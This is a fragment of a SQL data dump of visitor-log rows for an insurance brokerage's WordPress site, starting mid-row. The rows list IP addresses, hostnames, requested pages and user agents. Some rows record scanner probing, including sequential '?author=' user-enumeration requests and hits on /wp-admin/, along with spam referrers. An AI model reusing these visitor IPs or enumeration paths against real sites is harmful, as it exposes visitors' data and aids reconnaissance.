Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(29270,'0b_d869e71cca8f730c17e57da77d3fd541','1463084873','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(29271,'0b_3eb96e0007c5fe2618ed181fd064757c','1463084910','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(29274,'0b_3eb96e0007c5fe2618ed181fd064757c','1463084911','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(29277,'0b_d869e71cca8f730c17e57da77d3fd541','1463084940','108.58.88.178','ool-6c3a58b2.static.optonline.net','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(29280,'0b_d869e71cca8f730c17e57da77d3fd541','1463084948','108.58.88.178','ool-6c3a58b2.static.optonline.net','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','51',0),(29282,'0b_865bb2b9b29d6bf8d2396356c9c15439','1463085106','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(29283,'0b_865bb2b9b29d6bf8d2396356c9c15439','1463085107','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(29286,'0b_872ceffb586eaa6ff2f4b1b1ede0ab14','1463085121','141.8.143.242','spider-141-8-143-242.yandex.com','/case-status/feed/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(29288,'0b_a1e6861f03f6b8efc73c757d8b117021','1463085362','66.249.66.18','crawl-66-249-66-18.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(29289,'0b_865bb2b9b29d6bf8d2396356c9c15439','1463085746','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(29292,'0b_865bb2b9b29d6bf8d2396356c9c15439','1463085748','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(29294,'0b_a1e6861f03f6b8efc73c757d8b117021','1463085779','66.249.66.12','crawl-66-249-66-12.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(29297,'0b_865bb2b9b29d6bf8d2396356c9c15439','1463085954','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(29300,'0b_865bb2b9b29d6bf8d2396356c9c15439','1463085955','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(29303,'0b_86dc41a490a1f08c8418efb6ad166238','1463088847','195.154.199.235','electro.az-streamingserver.com','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(29306,'0b_86dc41a490a1f08c8418efb6ad166238','1463088848','195.154.199.235','electro.az-streamingserver.com','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(29307,'0b_86dc41a490a1f08c8418efb6ad166238','1463088849','195.154.199.235','electro.az-streamingserver.com','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(29309,'0b_48481f819d62143a42cc8e98f213a0fc','1463090284','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(29312,'0b_48481f819d62143a42cc8e98f213a0fc','1463090286','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(29315,'0b_2b4eb6dadd194255e58564bdaefb1032','1463090548','180.76.15.156','baiduspider-180-76-15-156.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(29318,'0b_f74dc56268afe69cd6789f8edc4abfbd','1463090583','87.236.195.22','unassigned-87.236.195.22.coolhousing.net','/wp-admin/','Mozilla/5.0 (Windows NT 6.2; rv:23.0) Gecko/20130406 Firefox/23.0','','',0,'Win8','Firefox 23','ru','','','','','','','0','0',0),(29319,'0b_a68454976baa5ac5086fbf8148ca5e83','1463092681','5.248.253.133','5-248-253-133-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)','http://zvetki.ru/','',0,'Windows','IE 6','','','','','','','','0','0',0),(29321,'0b_a68454976baa5ac5086fbf8148ca5e83','1463092681','5.248.253.133','5-248-253-133-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)','http://zvetki.ru/','',0,'Windows','IE 6','','','','','','','','0','0',0),(29322,'0b_e70beb55dad0c9f8c9e5a3e0d8cbefa1','1463094215','66.249.66.24','crawl-66-249-66-24.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(29324,'0b_f96a50ef18899025ad2df0a9899a004b','1463097841','178.255.215.70','crawl06.exabot.com','/robots.txt','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(29325,'0b_f96a50ef18899025ad2df0a9899a004b','1463097843','178.255.215.70','crawl06.exabot.com','/licensing-contracting/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(29327,'0b_6cbdb95f3839fb9142f3a2393a9ecb03','1463101210','178.255.215.70','crawl06.exabot.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(29328,'0b_d7e03a3a8479a8710619693472d15c6a','1463102724','66.249.66.37','crawl-66-249-66-37.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(29331,'0b_d7e03a3a8479a8710619693472d15c6a','1463102725','66.249.66.37','crawl-66-249-66-37.googlebot.com','/.well-known/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(29334,'0b_d7e03a3a8479a8710619693472d15c6a','1463102726','66.249.66.37','crawl-66-249-66-37.googlebot.com','/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(29336,'0b_5c4f2b76ab4c35892e1f66acc950cd58','1463107753','157.55.39.85','msnbot-157-55-39-85.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(29337,'0b_ab73daf445d42083b4630f867df2dc99','1463108067','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 1.0.5)','http://intervsem.ru/','',0,'WinXP','Crazy Browser 1','','','','','','','','0','0',0),(29340,'0b_b6066d6dff3636c74bf03f5fb782efca','1463110705','40.77.167.18','msnbot-40-77-167-18.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(29343,'0b_b6066d6dff3636c74bf03f5fb782efca','1463110868','40.77.167.96','msnbot-40-77-167-96.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(29346,'0b_061c574e24eb7608621a76591380b5e0','1463110908','98.243.52.74','c-98-243-52-74.hsd1.mi.comcast.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win10','Chrome 50','us','1366 x 768','Google','','','','','0','0',0),(29349,'0b_061c574e24eb7608621a76591380b5e0','1463110911','98.243.52.74','c-98-243-52-74.hsd1.mi.comcast.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 50','us','1366 x 768','','','','','','0','0',0),(29352,'0b_061c574e24eb7608621a76591380b5e0','1463110935','98.243.52.74','c-98-243-52-74.hsd1.mi.comcast.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win10','Chrome 50','us','1366 x 768','Google','','','','','0','0',0),(29355,'0b_061c574e24eb7608621a76591380b5e0','1463110937','98.243.52.74','c-98-243-52-74.hsd1.mi.comcast.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 50','us','1366 x 768','','','','','','0','0',0),(29357,'0b_061c574e24eb7608621a76591380b5e0','1463110941','98.243.52.74','c-98-243-52-74.hsd1.mi.comcast.net','/insentives/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 50','us','1366 x 768','','','','','','0','51',0),(29358,'0b_061c574e24eb7608621a76591380b5e0','1463110945','98.243.52.74','c-98-243-52-74.hsd1.mi.comcast.net','/carriers/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','http://www.empireins.com/insentives/','',0,'Win10','Chrome 50','us','1366 x 768','','','','','','0','51',0),(29361,'0b_061c574e24eb7608621a76591380b5e0','1463110959','98.243.52.74','c-98-243-52-74.hsd1.mi.comcast.net','/about-us/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win10','Chrome 50','us','1366 x 768','','','','','','0','51',0),(29364,'0b_061c574e24eb7608621a76591380b5e0','1463110980','98.243.52.74','c-98-243-52-74.hsd1.mi.comcast.net','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win10','Chrome 50','us','1366 x 768','','','','','','0','51',0),(29366,'0b_b6066d6dff3636c74bf03f5fb782efca','1463111088','40.77.167.96','msnbot-40-77-167-96.search.msn.com','/forms/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(29367,'0b_c91f2b2426e648a5caa3daf7ccd3cacf','1463112190','66.249.66.12','crawl-66-249-66-12.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(29370,'0b_c91f2b2426e648a5caa3daf7ccd3cacf','1463112191','66.249.66.8','crawl-66-249-66-8.googlebot.com','/illustration.htm','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(29373,'0b_c473a245a3745b2314a931b64da4b153','1463112890','66.87.117.217','217-117-87-66.pools.cgn.spcsdns.net','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','0',0),(29376,'0b_c473a245a3745b2314a931b64da4b153','1463112892','66.87.117.217','217-117-87-66.pools.cgn.spcsdns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','http://www.empireins.com/','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','0',0),(29379,'0b_c473a245a3745b2314a931b64da4b153','1463112901','66.87.117.217','217-117-87-66.pools.cgn.spcsdns.net','/case-status/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','http://www.empireins.com/','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','0',0),(29382,'0b_c473a245a3745b2314a931b64da4b153','1463112913','66.87.117.217','217-117-87-66.pools.cgn.spcsdns.net','/term-quotes/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','http://www.empireins.com/','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','51',0),(29385,'0b_282a937d4447bb50842352009387131b','1463114211','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(29388,'0b_1a76f64c695168efd2d1559586e3b3f3','1463115155','188.143.232.72','188.143.232.72','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; rv:19.0) Gecko/20100101 Firefox/19.0','','',0,'Win7','Firefox 19','us','','','','','','','0','0',0),(29391,'0b_a0757d4546b65b322e0c24d3e218177f','1463115311','192.227.245.93','192-227-245-93-host.colocrossing.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0','http://www.empireins.com/','',0,'Win8 x64','Firefox 34','us','','','','','','','0','0',0),(29394,'0b_ad4344102ef64a3817f3ddf086c21727','1463115999','92.236.71.145','cpc94094-newt38-2-0-cust912.19-3.cable.virginm.net','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(29396,'0b_ad4344102ef64a3817f3ddf086c21727','1463116001','92.236.71.145','cpc94094-newt38-2-0-cust912.19-3.cable.virginm.net','/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(29397,'0b_614b621224152ebca992eaaff0beaeff','1463117013','5.248.253.133','5-248-253-133-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01','http://zastenchivosti.net/','',0,'WinXP','Opera 8','ru','','','','','','','0','0',0),(29400,'0b_614b621224152ebca992eaaff0beaeff','1463117013','5.248.253.133','5-248-253-133-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01','http://zastenchivosti.net/','',0,'WinXP','Opera 8','ru','','','','','','','0','0',0),(29403,'0b_2be1c1f4289fa2fdc3af78789a9c8af5','1463117478','91.200.12.26','huangdisisi0708.com','/?author=1','Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)','http://www.empireins.com/?author=1','',0,'Win7','IE 9','cn','','','','','','','0','0',0),(29405,'0b_5e98f2419d0f6e455b3e6e6db8afbbd7','1463117479','91.200.12.26','huangdisisi0708.com','/?author=1','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(29406,'0b_5e98f2419d0f6e455b3e6e6db8afbbd7','1463117525','91.200.12.26','huangdisisi0708.com','/author/admin/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(29408,'0b_5e98f2419d0f6e455b3e6e6db8afbbd7','1463117529','91.200.12.26','huangdisisi0708.com','/?author=2','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(29411,'0b_5e98f2419d0f6e455b3e6e6db8afbbd7','1463117531','91.200.12.26','huangdisisi0708.com','/?author=3','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(29412,'0b_5e98f2419d0f6e455b3e6e6db8afbbd7','1463117532','91.200.12.26','huangdisisi0708.com','/?author=4','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(29415,'0b_5e98f2419d0f6e455b3e6e6db8afbbd7','1463117548','91.200.12.26','huangdisisi0708.com','/?author=5','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(29418,'0b_e5fdef758b4649cc6cb2bdbeb779d68b','1463118886','46.119.127.129','sol-fttb.129.127.119.46.sovam.net.ua','/robots.txt','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32','','',0,'Win10','Google Chrome','ua','','','Unknown Spider','','','','3','0',0),(29421,'0b_e5fdef758b4649cc6cb2bdbeb779d68b','1463118890','46.119.127.129','sol-fttb.129.127.119.46.sovam.net.ua','/wp-admin/admin-ajax.php','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32','','',0,'Win10','Google Chrome','ua','','','Unknown Spider','','','','3','0',0),(29423,'0b_e5fdef758b4649cc6cb2bdbeb779d68b','1463118894','46.119.127.129','sol-fttb.129.127.119.46.sovam.net.ua','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32','','',0,'Win10','Google Chrome','ua','','','','','','','3','0',0),(29426,'0b_0bef4f169e209e0e3cffb755e9ca4ecb','1463118896','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(29427,'0b_e9322d9f844f6ed20f3fd925a6ddbfa9','1463120761','158.69.225.35','spider-13.lipperhey.com','/','Mozilla/5.0 (compatible; Dataprovider/6.92; +https://www.dataprovider.com/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29429,'0b_e9322d9f844f6ed20f3fd925a6ddbfa9','1463120766','158.69.225.35','spider-13.lipperhey.com','/robots.txt','Mozilla/5.0 (compatible; Dataprovider/6.92; +https://www.dataprovider.com/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29432,'0b_e9322d9f844f6ed20f3fd925a6ddbfa9','1463120767','158.69.225.35','spider-13.lipperhey.com','/','Mozilla/5.0 (compatible; Dataprovider/6.92; +https://www.dataprovider.com/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29433,'0b_e9322d9f844f6ed20f3fd925a6ddbfa9','1463120768','158.69.225.35','spider-13.lipperhey.com','/contact/','Mozilla/5.0 (compatible; Dataprovider/6.92; +https://www.dataprovider.com/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29435,'0b_e9322d9f844f6ed20f3fd925a6ddbfa9','1463120770','158.69.225.35','spider-13.lipperhey.com','/about-us/','Mozilla/5.0 (compatible; Dataprovider/6.92; +https://www.dataprovider.com/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29436,'0b_e9322d9f844f6ed20f3fd925a6ddbfa9','1463120771','158.69.225.35','spider-13.lipperhey.com','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; Dataprovider/6.92; +https://www.dataprovider.com/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29438,'0b_e9322d9f844f6ed20f3fd925a6ddbfa9','1463120773','158.69.225.35','spider-13.lipperhey.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; Dataprovider/6.92; +https://www.dataprovider.com/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29441,'0b_e9322d9f844f6ed20f3fd925a6ddbfa9','1463120774','158.69.225.35','spider-13.lipperhey.com','/case-status/','Mozilla/5.0 (compatible; Dataprovider/6.92; +https://www.dataprovider.com/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29444,'0b_e9322d9f844f6ed20f3fd925a6ddbfa9','1463120775','158.69.225.35','spider-13.lipperhey.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; Dataprovider/6.92; +https://www.dataprovider.com/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29447,'0b_e9322d9f844f6ed20f3fd925a6ddbfa9','1463120776','158.69.225.35','spider-13.lipperhey.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; Dataprovider/6.92; +https://www.dataprovider.com/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29450,'0b_e9322d9f844f6ed20f3fd925a6ddbfa9','1463120777','158.69.225.35','spider-13.lipperhey.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; Dataprovider/6.92; +https://www.dataprovider.com/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29451,'0b_e9322d9f844f6ed20f3fd925a6ddbfa9','1463120779','158.69.225.35','spider-13.lipperhey.com','/forms/','Mozilla/5.0 (compatible; Dataprovider/6.92; +https://www.dataprovider.com/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29454,'0b_e9322d9f844f6ed20f3fd925a6ddbfa9','1463120782','158.69.225.35','spider-13.lipperhey.com','/insentives/','Mozilla/5.0 (compatible; Dataprovider/6.92; +https://www.dataprovider.com/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(29457,'0b_4c884aaf23f60f9a34f71a71e1801fb0','1463120783','158.69.225.35','spider-13.lipperhey.com','/','Mozilla/5.0 (Linux; Android 4.05; Galaxy Nexus Build/IMM76B) AppleWebKit/535.25 (KHTML, like Gecko) Chrome/17.0.1025.133 Mobile Safari/536.19','','',0,'Android 4','Chrome 17 Mobile','','','','Unknown Spider','','','','0','0',0),(29459,'0b_27d567657c6ff77e5578996ac809029c','1463121101','66.249.66.24','crawl-66-249-66-24.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(29462,'0b_60509ab8464183513107442a20d2f849','1463122719','54.211.7.6','ec2-54-211-7-6.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0','','',0,'Win7','Firefox 4','','','','','','','','0','0',0),(29465,'0b_a38b821796a7c3ec9a248037fee97506','1463122720','54.211.7.6','ec2-54-211-7-6.compute-1.amazonaws.com','/','Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 NokiaN9','','',0,'Nokia','Nokia','us','','','','','','','0','0',0),(29468,'0b_5f19de1d7aea6c57821cf8200fbe57e2','1463122721','54.211.7.6','ec2-54-211-7-6.compute-1.amazonaws.com','/mobile','Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0','','',0,'Win7','Firefox 20','','','','','','','','0','0',0),(29469,'0b_a38b821796a7c3ec9a248037fee97506','1463122723','54.211.7.6','ec2-54-211-7-6.compute-1.amazonaws.com','/mobi/','Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 NokiaN9','','',0,'Nokia','Nokia','us','','','','','','','0','0',0),(29471,'0b_5f19de1d7aea6c57821cf8200fbe57e2','1463122726','54.211.7.6','ec2-54-211-7-6.compute-1.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0','','',0,'Win7','Firefox 20','','','','','','','','0','0',0),(29474,'0b_5f19de1d7aea6c57821cf8200fbe57e2','1463122727','54.211.7.6','ec2-54-211-7-6.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0','','',0,'Win7','Firefox 20','','','','','','','','0','0',0),(29475,'0b_60509ab8464183513107442a20d2f849','1463122728','54.211.7.6','ec2-54-211-7-6.compute-1.amazonaws.com','/?mobile=1','Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0','','',0,'Win7','Firefox 4','','','','','','','','0','0',0),(29477,'0b_a38b821796a7c3ec9a248037fee97506','1463122728','54.211.7.6','ec2-54-211-7-6.compute-1.amazonaws.com','/','Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 NokiaN9','','',0,'Nokia','Nokia','us','','','','','','','0','0',0),(29480,'0b_5f19de1d7aea6c57821cf8200fbe57e2','1463122729','54.211.7.6','ec2-54-211-7-6.compute-1.amazonaws.com','/mobile','Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0','','',0,'Win7','Firefox 20','','','','','','','','0','0',0),(29483,'0b_a38b821796a7c3ec9a248037fee97506','1463122730','54.211.7.6','ec2-54-211-7-6.compute-1.amazonaws.com','/mobi/','Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 